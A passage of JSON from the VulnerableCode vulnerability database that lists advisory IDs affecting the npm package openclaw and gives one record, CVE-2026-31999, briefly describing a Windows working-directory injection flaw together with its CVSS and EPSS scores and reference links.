bility":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq
-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5
-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx
-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b
-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd
-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-7xmq-g46g-f8pv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-93ka-ajkk-3keu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50507?format=json","vulnerability_id":"VCID-9nq6-ujfu-4ycx","summary":"OpenClaw's ACPX Windows wrapper shell fallback allowed cwd injection in specific paths\nOn Windows ACPX paths, wrapper resolution for `.cmd`/`.bat` could fall back to shell execution in ways that allowed `cwd` influence to alter execution 
behavior.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31999","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25976","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25983","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31999"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-23T16:45:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-current-working-directory-injection-via-windows-wrapper-resolution-fallback"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999","reference_id":"CVE-2026-31999","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N
/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31999"},{"reference_url":"https://github.com/advisories/GHSA-6f6j-wx9w-ff4j","reference_id":"GHSA-6f6j-wx9w-ff4j","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6f6j-wx9w-ff4j"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j","reference_id":"GHSA-6f6j-wx9w-ff4j","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-23T16:45:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6f6j-wx9w-ff4j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerabi
lity":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerabi
lity":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerabi
lity":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerabi
lity":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-